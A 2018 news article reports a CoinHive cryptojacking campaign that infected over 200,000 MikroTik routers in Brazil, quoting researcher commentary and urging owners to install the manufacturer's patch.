Brazil has been hit by an elaborate attack of cryptocurrency miners that has infected hundreds of thousands of routers across the country.
The attack, which is still ongoing, is specifically about MikroTik routers. In this case, more than 200,000 machines were hit, creating a massive XMR-mining botnet across Brazil.
Perpetrators were able to infect devices with malicious code, clandestinely running CoinHive in the background. For those unfamiliar, CoinHive is a popular Monero mining script that has become widely used to bundle processing power for cryptocurrency – often for charity, but unfortunately not this time.
This type of attack is known as a zero day – exploiting previously unknown vulnerabilities in the code. This zero day allowed for CoinHive to run on every single page visited by exposed machines – potentially millions of websites uploaded every day with secret cryptocurrency payloads.
The attack started at the start of this week and is believed to be just beginning. BleepingComputer reports that a second attack has started, bringing the total number of machines affected to over 200,000.
The Coinhive site key "oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4" is used in another campaign #cryptojacking addressed to MikroTik routers. In this case, over 25,000 affected hosts are found on @censysio
h / t @onyphe https://t.co/M9iLatsIVX
– Bad Packets Report (@bad_packets) August 2, 2018
Although a patch for this vulnerability was released by the manufacturer in April, routers are often out of date. This means that anyone with a MikroTik router is invited to immediately correct their routers.
Analysts fear it could spread like a global epidemic. SpiderLabs' research Simon Kenin, who has since worked to spread the news of the attack, was informed of the suspicious traffic of CoinHive from Brazil.
" Let me underline how bad this attack is," he wrote in analysis. "There are hundreds of thousands of these devices around the world, used by ISPs and different organizations and companies, each device serving at least tens if not hundreds of users per day."
this is indeed symptomatic of a broader trend on the Internet. A few years ago, the world was prey to a plague of ransomware . The awareness has increased so much that the blackmail schemes have become more difficult to complete.
Now, it seems as if the crypto-jacking with scripts like CoinHive are all rage. Kenin further emphasizes this tendency in his report:
Miners, on the other hand, can be much more stealthy, so while a single computer could produce more money from the ransomware if the user ends up paying, a attacker would prefer to run a stealthed miner for a longer period of time. The plan is that at some point the extraction would be just as beneficial as, if not more, the single ransom payout.
So just in a hurry, double check that you do not have a MicroTik router. If you do, go directly to the manufacturer's website and get an official update.
Published 3 August 2018 – 13:58 UTC